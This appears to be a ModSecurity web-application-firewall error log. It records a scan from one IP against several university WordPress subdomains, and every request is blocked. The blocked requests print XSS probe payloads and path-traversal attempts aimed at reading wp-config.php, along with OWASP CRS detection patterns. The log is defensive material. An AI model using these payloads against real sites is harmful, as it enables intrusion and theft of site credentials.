[Tue Aug 29 11:51:44.568174 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAmLPVcAAAAN"]
[Tue Aug 29 11:51:44.574383 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAnmT2MAAAAd"]
[Tue Aug 29 11:51:44.583212 2023] [:error] [pid 2503] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAnHQhUAAAAT"]
[Tue Aug 29 11:51:44.671965 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAnepOkAAAAK"]
[Tue Aug 29 11:51:44.684134 2023] [:error] [pid 2443] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YMCo-f0AAAmLPVsAAAAN"]
[Tue Aug 29 11:51:45.544367 2023] [:error] [pid 2517] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAnVEe8AAAAB"]
[Tue Aug 29 11:51:45.557983 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAnmT2cAAAAd"]
[Tue Aug 29 11:51:45.567875 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAhoHQoAAAAl"]
[Tue Aug 29 11:51:45.618769 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAnepOsAAAAK"]
[Tue Aug 29 11:51:45.630794 2023] [:error] [pid 2440] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YcCo-f0AAAmIbSQAAAAo"]
[Tue Aug 29 11:51:45.652627 2023] [:error] [pid 2269] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS_NAMES:"></script><script>alert(document.domain)</script>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS_NAMES:\\x22></script><script>alert(document.domain)</script>: \\x22></script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-admin/options-general.php"] [unique_id "ZO15YcCo-f0AAAjdQXsAAAAZ"]
[Tue Aug 29 11:51:46.740524 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:media. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:media: \\x22></script><script>alert(document.domain)</script><\\x22"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/s3-video/views/video-management/preview_video.php"] [unique_id "ZO15YsCo-f0AAAnmT24AAAAd"]
[Tue Aug 29 11:51:47.541606 2023] [:error] [pid 2491] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAm7nDMAAAAE"]
[Tue Aug 29 11:51:47.547657 2023] [:error] [pid 2521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAnZfE4AAAAG"]
[Tue Aug 29 11:51:47.549486 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAlUllYAAAA0"]
[Tue Aug 29 11:51:47.576659 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAnIljkAAAAV"]
[Tue Aug 29 11:51:47.603214 2023] [:error] [pid 2388] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15Y8Co-f0AAAlUllgAAAA0"]
[Tue Aug 29 11:51:48.615931 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:src: <body onload=alert(1)>.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAni@7gAAAAU"]
[Tue Aug 29 11:51:48.619245 2023] [:error] [pid 2521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAnZfFMAAAAG"]
[Tue Aug 29 11:51:48.625158 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:src: <body onload=alert(1)>.jpg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAnIlj0AAAAV"]
[Tue Aug 29 11:51:48.631157 2023] [:error] [pid 2532] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:src: <body onload=alert(1)>.jpg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "ft.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAnkwcAAAAAY"]
[Tue Aug 29 11:51:48.637352 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:error. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: 1<script found within ARGS:error: 1<script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/atmail/index.php/admin/index/"] [unique_id "ZO15ZMCo-f0AAAnepPIAAAAK"]
[Tue Aug 29 11:51:48.649490 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: > found within ARGS:src: <body onload=alert(1)>.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAhoHRUAAAAl"]
[Tue Aug 29 11:51:48.664232 2023] [:error] [pid 2527] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:src: <body onload=alert(1)>.jpg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZMCo-f0AAAnf3mEAAAAM"]
[Tue Aug 29 11:51:48.685748 2023] [:error] [pid 2548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAn0GXAAAAAa"]
[Tue Aug 29 11:51:48.688907 2023] [:error] [pid 2521] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAnZfFUAAAAG"]
[Tue Aug 29 11:51:48.750115 2023] [:error] [pid 2504] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAnIlj8AAAAV"]
[Tue Aug 29 11:51:48.766383 2023] [:error] [pid 2526] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dew_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:dew_file: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php"] [unique_id "ZO15ZMCo-f0AAAnepPUAAAAK"]
[Tue Aug 29 11:51:49.578472 2023] [:error] [pid 2534] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:src. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onload= found within ARGS:src: <body onload=alert(1)>.jpg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-content/themes/ambience/thumb.php"] [unique_id "ZO15ZcCo-f0AAAnmT3kAAAAd"]
